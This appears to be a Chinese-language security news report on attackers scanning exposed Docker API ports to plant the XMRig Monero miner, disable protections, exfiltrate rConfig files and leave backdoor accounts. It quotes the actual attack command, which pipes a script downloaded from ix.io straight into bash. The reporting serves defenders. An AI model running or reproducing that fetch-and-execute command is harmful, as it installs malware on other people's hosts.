駭客掃描網路Docker植入挖礦程式，還修改設定、留下後門

隨著愈來愈多關鍵應用搬上Docker，也成為駭客下手的目標。安全廠商發現駭客近日正在網路上掃描曝露出的API，意圖植入挖礦程式利用受害者系統資源謀利，還會關閉系統的防護機制或留下後門。

Bad Packets偵測到從本周日（11月24日）午夜起，出現針對Docker系統的罕見大量掃描網路活動，利用掃描工具Zmap掃描TCP port 2375、2376、2377、4243。這波流量疑似駭客攻擊前的偵察性掃描。

ZDNet引述Bad Packets公司研究長Troy Mursch報導，目前駭客一共掃描了高達近5.9萬個IP網路來尋找曝露的Docker執行個體。一旦找到受害系統的API，攻擊者就會利用API端點啟用Alpine Linux容器，並執行指令「chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa  | bash」。此一指令可用於下載、執行Bash script，目的在安裝Monero挖礦程式XMRig。而在觀察到這波流量後2天，駭客已經挖到價值740美元的Monero幣。

安全公司另外還發現，駭客還會透過一臺遠端伺服器下載script到受害Docker系統上，企圖關閉已知的防火牆及其他安全防護、刪除別的挖礦殭屍網路的程式行程，且掃描、加密受害主機上的rConfig設定檔，將之傳到駭客的C&C伺服器。另一家安全業者SandflySecurity 分析則顯示，它還會留下後門帳號、SSH金鑰，以及變更主機設定，以便未來更方便控制及存取主機。

安全公司建議用戶儘速關閉Docker API傳輸埠，並刪除掉所有不認識的容器。